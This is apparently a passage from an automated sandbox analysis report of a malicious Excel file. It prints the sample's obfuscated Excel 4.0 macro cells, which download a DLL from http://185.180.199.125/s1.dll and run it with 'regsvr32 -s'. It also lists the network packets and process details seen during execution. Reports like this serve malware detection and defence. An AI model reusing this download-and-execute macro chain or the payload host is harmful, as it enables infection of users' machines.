                                                                                                                                                      ,,,,,,,,,,,,,,,,,,,ht,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,tp://,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,185.180.199.125/s1.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\jbeiwmje.dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,A,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=EXEC(before.2.18.42.sheet!BK73&before.2.18.42.sheet!BK74&before.2.18.42.sheet!BK75&before.2.18.42.sheet!BN24),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,UR,,,,LMon,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT()"=CALL(BJ29&BN29,BR66&BR69&BX72&BZ72&BS25,BP81&BX73,BU64,BJ19&BJ20&BJ21&BJ22,BN24,BU69,BU72)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=before.2.18.42.sheet!BZ25(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,UR,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,LDownl,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,oa,,dToFile,,,,,,,,,,,,,,,,,,,,re,,,,,,,,,,,,,CBB,,,,,,,,,,,,,,,,,,,,,,gs,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""vr32 -s """,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,JJC,,,,,,,,,,

                                                                                                                                                      Network Behavior

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Jun 11, 2021 12:16:10.141882896 CEST4973580192.168.2.4185.180.199.125
                                                                                                                                                      Jun 11, 2021 12:16:13.319777012 CEST4973580192.168.2.4185.180.199.125
                                                                                                                                                      Jun 11, 2021 12:16:19.382778883 CEST4973580192.168.2.4185.180.199.125

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Jun 11, 2021 12:15:53.493258953 CEST4971453192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:15:53.551745892 CEST53497148.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:15:53.809528112 CEST5802853192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:15:53.873652935 CEST53580288.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:15:54.708446980 CEST5309753192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:15:54.761431932 CEST53530978.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:15:55.995307922 CEST4925753192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:15:56.066596031 CEST53492578.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:15:57.111721039 CEST6238953192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:15:57.163543940 CEST53623898.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:15:58.253417015 CEST4991053192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:15:58.319250107 CEST53499108.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:15:59.332068920 CEST5585453192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:15:59.385024071 CEST53558548.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:00.630373955 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:00.681914091 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:05.749245882 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:05.807897091 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:06.852235079 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:06.940634012 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:07.438770056 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:07.512856007 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:07.771310091 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:07.821919918 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:08.481621027 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:08.540282965 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:09.525120974 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:09.585932016 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:10.231311083 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:10.292875051 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:11.346471071 CEST5653453192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:11.405950069 CEST53565348.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:11.523520947 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:11.593029976 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:12.497983932 CEST5662753192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:12.548055887 CEST53566278.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:13.893482924 CEST5662153192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:13.943918943 CEST53566218.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:14.892127037 CEST6311653192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:14.942440987 CEST53631168.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:15.660285950 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:15.718601942 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:16.331017971 CEST6407853192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:16.381201982 CEST53640788.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:18.312237978 CEST6480153192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:18.362268925 CEST53648018.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:19.281068087 CEST6172153192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:19.333925009 CEST53617218.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:20.226000071 CEST5125553192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:20.276062012 CEST53512558.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:21.346118927 CEST6152253192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:21.373193026 CEST5233753192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:21.407341957 CEST53615228.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:21.426676989 CEST53523378.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:23.506586075 CEST5504653192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:23.578686953 CEST53550468.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:23.714297056 CEST4961253192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:23.785911083 CEST53496128.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:39.888449907 CEST4928553192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:40.038907051 CEST53492858.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:40.713340044 CEST5060153192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:40.774751902 CEST53506018.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:41.361578941 CEST6087553192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:41.409596920 CEST5644853192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:41.438304901 CEST53608758.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:41.471177101 CEST53564488.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:41.901827097 CEST5917253192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:41.963762999 CEST53591728.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:42.533973932 CEST6242053192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:42.682137966 CEST53624208.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:43.247425079 CEST6057953192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:43.307027102 CEST53605798.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:43.741061926 CEST5018353192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:43.799549103 CEST53501838.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:44.967226028 CEST6153153192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:45.026585102 CEST53615318.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:45.903760910 CEST4922853192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:45.963625908 CEST53492288.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:46.460103035 CEST5979453192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:46.518554926 CEST53597948.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:48.928911924 CEST5591653192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:48.988672972 CEST53559168.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:58.783878088 CEST5275253192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:58.853579044 CEST53527528.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:16:59.096837044 CEST6054253192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:16:59.155209064 CEST53605428.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:17:01.396725893 CEST6068953192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:17:01.456741095 CEST53606898.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:17:34.933397055 CEST6420653192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:17:35.001199961 CEST53642068.8.8.8192.168.2.4
                                                                                                                                                      Jun 11, 2021 12:17:36.844029903 CEST5090453192.168.2.48.8.8.8
                                                                                                                                                      Jun 11, 2021 12:17:36.902456045 CEST53509048.8.8.8192.168.2.4

                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      CPU Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Memory Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      General

                                                                                                                                                      Start time:12:16:05
                                                                                                                                                      Start date:11/06/2021
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                      Imagebase:0xe80000
                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:12:16:31
                                                                                                                                                      Start date:11/06/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:regsvr32 -s ..\jbeiwmje.dll
                                                                                                                                                      Imagebase:0xf30000
                                                                                                                                                      File size:20992 bytes
                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                      Reset < >